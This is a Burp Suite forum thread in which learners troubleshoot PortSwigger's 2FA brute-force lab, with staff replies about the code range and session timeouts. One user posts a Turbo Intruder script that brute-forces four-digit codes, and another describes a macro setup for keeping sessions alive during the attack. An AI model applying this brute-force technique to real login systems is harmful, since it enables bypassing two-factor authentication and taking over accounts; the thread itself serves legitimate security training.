Burp Suite User Forum

Login to post

Lab: 2FA bypass using a brute-force attack

Roman | Last updated: Jun 11, 2020 06:39PM UTC

I have been working on this one for a while. Outside the corporate network and working from home, I have found the responses came back very slowly compared to some other similar labs I have run. Therefore, when I ran my solution, I always ran out of time before I could find the right answer (a 302) coming back. My solution to that problem was to open up 10 burp suite instances on my laptop and run each Intruder against a different range. I did this because the cookie jar was causing issues for attacks running at the same time so I needed to have a unique cookie jar per intruder thread. Unfortunately, after running this attack several times and hitting a 302, I found the code tested on the request when the 302 was received was not the right code to solve the lab. I tried a whole bunch of other codes on other intruders falling around the same time frame just in case the wires got crossed somehow. None of them worked either. Mystified, I finally gave in and looked at your solution. This turned out to be exactly my original solution without the 10 intruders which won't work for me in my current slow network environment. I was wondering if there was any way to disable the session time-out or lengthen it enough to get me to test the entire keyspace. I guess until then, I will keep trying the single intruder until I get lucky enough to get a 302 in random rather than sequential mode. Thanks, Roman

Ben, PortSwigger Agent | Last updated: Jun 12, 2020 09:09AM UTC

Hi Roman, Thank you for your feedback. We did not encounter this when we were testing this lab but we have had several people mention that the lab is causing them issues due to the reasons that you have highlighted. In view of this, we have changed the lab slightly so that the solution is not in the higher range of numbers. Are you able to try the lab again today to see if it improves the situation for you?

Luis | Last updated: Jul 22, 2020 03:53PM UTC

Hi PortSwigger, What range should we be scanning? Thanks!

Ben, PortSwigger Agent | Last updated: Jul 22, 2020 06:35PM UTC

Hi, You should still try the range 0-9999 as detailed in the lab instructions but, as mentioned in the above message, the 2FA value will not be in the higher range of numbers. This should mean users will find the answer before they encounter any potential lab timeout issues.

Luis | Last updated: Jul 23, 2020 03:52PM UTC

It worked thanks!

MBZ | Last updated: Aug 02, 2020 03:01PM UTC

It's not working for me. I've tried two times to no avail.

Ben, PortSwigger Agent | Last updated: Aug 03, 2020 08:19AM UTC

Hi, Are you able to provide us with some details of the issues that you are encountering whilst trying to solve this lab so that we can assist you?

halfluke | Last updated: Aug 20, 2020 09:10PM UTC

Getting session expired after about 4470 attempts starting from 0000 and no solution found. Expert ok... uselessly frustrating is not

Ben, PortSwigger Agent | Last updated: Aug 21, 2020 07:16AM UTC

Hi, What range of number do you get up to when performing the attack? As noted earlier in the thread, we changed the lab so that the solution would always occur in the lower range of numbers to make it slightly less frustrating for users.

halfluke | Last updated: Aug 21, 2020 11:14AM UTC

as I said from 0000 up. It worked in the end after 4 attempts. Thanks

shubham | Last updated: Sep 02, 2020 05:02AM UTC

how to do this turbo intrude? because i have tried so many times & my session expired after 300-400 requests!

shubham | Last updated: Sep 02, 2020 05:04AM UTC

how to do this with turbo intruder? because i have tried so many times & my session get expired after 300-400 requests!

Uthman, PortSwigger Agent | Last updated: Sep 02, 2020 02:07PM UTC

You may find the code in this thread helpful: - https://forum.portswigger.net/thread/lab-2fa-bypass-using-a-brute-force-attack-714dab1f Alternatively, you can try writing your own script. There are helpful generalized examples in the GitHub repo: - https://github.com/PortSwigger/turbo-intruder/tree/master/resources/examples

Motasem | Last updated: Oct 03, 2020 08:55AM UTC

Hi, i have tried many times but it doesn't work lab session expires after reaching 1600 request! starting from 0 to 9999 !! would you please confirm it if it's still working in the lower range?? Thank you,

Motasem | Last updated: Oct 03, 2020 11:35AM UTC

Finally!! after the 7th try :) the code: 0315

deep1 | Last updated: Nov 14, 2020 11:40AM UTC

hello. im tryn to solve 2FA bypass using a brute-force attack lab but after sending the first request HTTP/1.1 400 Bad Request Content-Type: application/json; charset=utf-8 Set-Cookie: session=EusRA8AnKybVaw5Md6cluwhZIH6gCFAG; Path=/; Secure; HttpOnly; SameSite=None Connection: close Content-Length: 60 "Invalid CSRF token (session does not contain a CSRF token)" i dont know if im doing somthing wrong or this is the lab issue

deep1 | Last updated: Nov 15, 2020 09:14AM UTC

hello again i try for like 30 time and i get the same error it would be great if some one help me with this please

Ben, PortSwigger Agent | Last updated: Nov 16, 2020 09:48AM UTC

Hi, One of our users, Michael Sommer, has produced some YouTube videos detailing the solutions for most of our labs. You might find it easier to follow along with these, rather than our text solution. The video for this lab is below: https://www.youtube.com/watch?v=B6JuMb3M-KA

deep1 | Last updated: Nov 16, 2020 02:31PM UTC

well i saw that video but this is the lab issue now im sure im doing the steps correctly and also i did tryd to make python script for it but i get invalide csrf after the first request i send the response code is 400

deep1 | Last updated: Nov 16, 2020 03:16PM UTC

do i need to set the range 0-9999 evrytime when i get 400 error ?

deep1 | Last updated: Nov 16, 2020 03:16PM UTC

do i need to set the range 0-9999 evrytime when i get 400 error ?

Ben, PortSwigger Agent | Last updated: Nov 17, 2020 08:51AM UTC

Hi, To clarify, what step of the solution are you having issues with and what steps have you taken so far?

deep1 | Last updated: Nov 17, 2020 05:55PM UTC

ok so first i login with the carlos creds and i will try a random number on the mfa-code like 1234 and after i get kicked out i will select this 3 requests and i GET /login POST /login GET /login2 and i will creat a session in project option Macro Recorder and i will send the post /login2 request in repeater with 1 thread at first i did get 400 error with my first request but now after 200 atemp i will get 400 error and i should repeat the whole steps again

Ben, PortSwigger Agent | Last updated: Nov 18, 2020 08:58AM UTC

Hi, If you are getting 400 statuses returned straight away then that would suggest something is not quite right in the requests that you are trying to send via Intruder. It might be easier to troubleshoot this if you can send us some screenshots of your Intruder configuration (and your macro) to support@portswigger.net so that we can take a look for you.

deep1 | Last updated: Nov 18, 2020 10:15AM UTC

hello, yes sure i can do that and thank you so much

silver.io | Last updated: Jan 05, 2021 02:09AM UTC

Can you perhaps be more specific regarding the adjusted range of numbers? Is the token guaranteed to be in the range 0-5000 or something? My session keeps timing out like many others. Furthermore, if we know the range is reduced to 0-5000 is there anyway we can optimize / make the search faster? My session is timing out before 5000. Thanks.

BaaL | Last updated: Jan 05, 2021 04:52PM UTC

hi silver.io, i don't know if the token is guaranteed in 0-5000 range or not but my token was 1979. My trick is to keep it in small number range using turbo intruder, like 0-3000 before 504 status code kick in. this is my turbo code : def queueRequests(target, wordlists): engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=5, engine=Engine.BURP # Use Burp's network stack, including upstream proxies etc ) for i in range(0, 5000): engine.queue(target.req, str(i).rjust(4, '0')) #for word in open('/usr/share/dict/words'): # engine.queue(target.req, word.rstrip()) def handleResponse(req, interesting): if '302' in req.response: table.add(req) elif '504' in req.response: table.add(req) Tip: Remember to add Extender in Scope to enable macros for Turbo. It's disabled by default.

Ben, PortSwigger Agent | Last updated: Jan 06, 2021 08:40AM UTC

Hi, I believe that the token should now be generated somewhere in the 0000-3000 range in order to make the lab easier to manage.

Ariel | Last updated: Jan 17, 2021 03:01PM UTC

i can't reach to 3000 request i get status code 504 after 2700 request. I have tried 4 times already

Ariel | Last updated: Jan 17, 2021 05:15PM UTC

Hi, after 5 times I got 302, but if i right click on "show response in browser" it doesn't login into account.

Ariel | Last updated: Jan 17, 2021 05:20PM UTC

i not click "request in browser". i try it in two browser in chromium and Firefox.

Ben, PortSwigger Agent | Last updated: Jan 18, 2021 07:14PM UTC

Hi, Once you have a request that has received a 302 response you then need to right click the request and select 'Show response in browser'. Once this has loaded in your browser you then need to click the 'My account' link in order to successfully solve the lab. We mentioned this earlier in this forum thread but one of our users has produced a series of videos providing walkthroughs of most of our labs - are you able to check the following video to make sure that you are matching the steps used: https://www.youtube.com/watch?v=B6JuMb3M-KA

Ariel | Last updated: Jan 20, 2021 10:52AM UTC

Hi , i saw this video and many others before i comment and i follow the steps it still don't give My-account when i press right click the request and select 'Show response in browser'

Ariel | Last updated: Jan 20, 2021 10:52AM UTC

Hi , i saw this video and many others before i comment and i follow the steps it still don't give My-account when i press right click the request and select 'Show response in browser'

Ben, PortSwigger Agent | Last updated: Jan 20, 2021 11:37AM UTC

Hi, If you are still having issues with this it might be easier to send us an email at support@portswigger.net with some screenshots of what you are seeing when you try and solve the lab. We can then take a look and see if we can help you further. I ran through this lab yesterday and was able to solve it using the solution provided so it is functioning and the solution is still accurate.

You need to Log in to post a reply. Or register here, for free.